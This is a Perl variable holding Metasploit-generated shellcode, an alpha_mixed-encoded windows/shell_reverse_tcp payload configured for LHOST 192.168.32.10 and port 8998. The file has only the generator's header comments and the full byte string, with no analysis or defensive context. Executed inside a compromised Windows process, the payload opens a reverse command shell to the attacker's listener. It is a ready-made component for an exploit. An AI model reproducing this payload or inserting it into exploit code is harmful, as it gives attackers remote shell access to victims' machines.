# windows/shell_reverse_tcp - 710 bytes
# https://metasploit.com/
# Encoder: x86/alpha_mixed
# VERBOSE=false, LHOST=192.168.32.10, LPORT=8998,
# ReverseAllowProxy=false, ReverseListenerThreaded=false,
# StagerRetryCount=10, StagerRetryWait=5,
# PrependMigrate=false, EXITFUNC=process, CreateSession=true,
# AutoVerifySession=true
my $buf =
"\x89\xe5\xdd\xc0\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x49\x6c\x5a\x48\x6c\x42\x47\x70\x77\x70" .
"\x67\x70\x73\x50\x4b\x39\x4a\x45\x65\x61\x69\x50\x33\x54" .
"\x6c\x4b\x46\x30\x50\x30\x4e\x6b\x51\x42\x64\x4c\x6e\x6b" .
"\x31\x42\x55\x44\x4e\x6b\x72\x52\x71\x38\x66\x6f\x78\x37" .
"\x53\x7a\x71\x36\x70\x31\x4b\x4f\x6c\x6c\x65\x6c\x45\x31" .
"\x33\x4c\x56\x62\x66\x4c\x75\x70\x79\x51\x4a\x6f\x34\x4d" .
"\x63\x31\x68\x47\x6a\x42\x59\x62\x72\x72\x71\x47\x6e\x6b" .
"\x62\x72\x52\x30\x6c\x4b\x50\x4a\x77\x4c\x4c\x4b\x30\x4c" .
"\x54\x51\x72\x58\x49\x73\x43\x78\x43\x31\x38\x51\x62\x71" .
"\x6e\x6b\x56\x39\x67\x50\x56\x61\x5a\x73\x4e\x6b\x71\x59" .
"\x47\x68\x79\x73\x75\x6a\x57\x39\x6e\x6b\x76\x54\x4e\x6b" .
"\x55\x51\x69\x46\x55\x61\x79\x6f\x4e\x4c\x7a\x61\x58\x4f" .
"\x34\x4d\x77\x71\x79\x57\x56\x58\x79\x70\x43\x45\x69\x66" .
"\x64\x43\x33\x4d\x68\x78\x45\x6b\x51\x6d\x36\x44\x51\x65" .
"\x39\x74\x66\x38\x4e\x6b\x30\x58\x56\x44\x36\x61\x4a\x73" .
"\x71\x76\x6c\x4b\x34\x4c\x70\x4b\x6e\x6b\x66\x38\x35\x4c" .
"\x55\x51\x69\x43\x4e\x6b\x47\x74\x6c\x4b\x66\x61\x48\x50" .
"\x6b\x39\x71\x54\x51\x34\x35\x74\x33\x6b\x33\x6b\x61\x71" .
"\x52\x79\x33\x6a\x32\x71\x4b\x4f\x49\x70\x43\x6f\x63\x6f" .
"\x72\x7a\x6e\x6b\x36\x72\x6a\x4b\x4e\x6d\x43\x6d\x75\x38" .
"\x37\x43\x74\x72\x33\x30\x57\x70\x51\x78\x64\x37\x72\x53" .
"\x56\x52\x73\x6f\x50\x54\x30\x68\x42\x6c\x31\x67\x47\x56" .
"\x64\x47\x4b\x4f\x4a\x75\x6f\x48\x6e\x70\x73\x31\x77\x70" .
"\x67\x70\x74\x69\x78\x44\x43\x64\x52\x70\x63\x58\x71\x39" .
"\x4f\x70\x30\x6b\x57\x70\x49\x6f\x4a\x75\x72\x70\x76\x30" .
"\x72\x70\x70\x50\x33\x70\x36\x30\x71\x50\x32\x70\x75\x38" .
"\x69\x7a\x64\x4f\x6b\x6f\x4b\x50\x39\x6f\x4b\x65\x4d\x47" .
"\x31\x7a\x34\x45\x43\x58\x79\x50\x4f\x58\x61\x30\x65\x5a" .
"\x42\x48\x76\x62\x77\x70\x64\x63\x64\x66\x4c\x49\x58\x66" .
"\x52\x4a\x46\x70\x43\x66\x73\x67\x31\x78\x4d\x49\x6d\x75" .
"\x42\x54\x63\x51\x69\x6f\x4e\x35\x4b\x35\x6b\x70\x32\x54" .
"\x44\x4c\x6b\x4f\x32\x6e\x55\x58\x71\x65\x68\x6c\x75\x38" .
"\x5a\x50\x4f\x45\x4f\x52\x62\x76\x4b\x4f\x78\x55\x53\x58" .
"\x52\x43\x50\x6d\x70\x64\x65\x50\x4d\x59\x49\x73\x33\x67" .
"\x53\x67\x50\x57\x76\x51\x79\x66\x63\x5a\x65\x42\x76\x39" .
"\x31\x46\x6b\x52\x39\x6d\x35\x36\x39\x57\x30\x44\x66\x44" .
"\x55\x6c\x76\x61\x33\x31\x4e\x6d\x51\x54\x56\x44\x74\x50" .
"\x49\x56\x73\x30\x63\x74\x30\x54\x70\x50\x36\x36\x76\x36" .
"\x62\x76\x50\x46\x73\x66\x70\x4e\x36\x36\x31\x46\x63\x63" .
"\x43\x66\x65\x38\x34\x39\x6a\x6c\x75\x6f\x4d\x56\x39\x6f" .
"\x6a\x75\x4c\x49\x39\x70\x72\x6e\x33\x66\x52\x66\x59\x6f" .
"\x50\x30\x32\x48\x53\x38\x6f\x77\x75\x4d\x51\x70\x6b\x4f" .
"\x39\x45\x4d\x6b\x38\x70\x48\x35\x79\x32\x63\x66\x32\x48" .
"\x6d\x76\x6c\x55\x6d\x6d\x6d\x4d\x4b\x4f\x6b\x65\x75\x6c" .
"\x35\x56\x51\x6c\x35\x5a\x6d\x50\x6b\x4b\x79\x70\x51\x65" .
"\x44\x45\x4d\x6b\x43\x77\x36\x73\x52\x52\x52\x4f\x50\x6a" .
"\x43\x30\x33\x63\x39\x6f\x38\x55\x41\x41";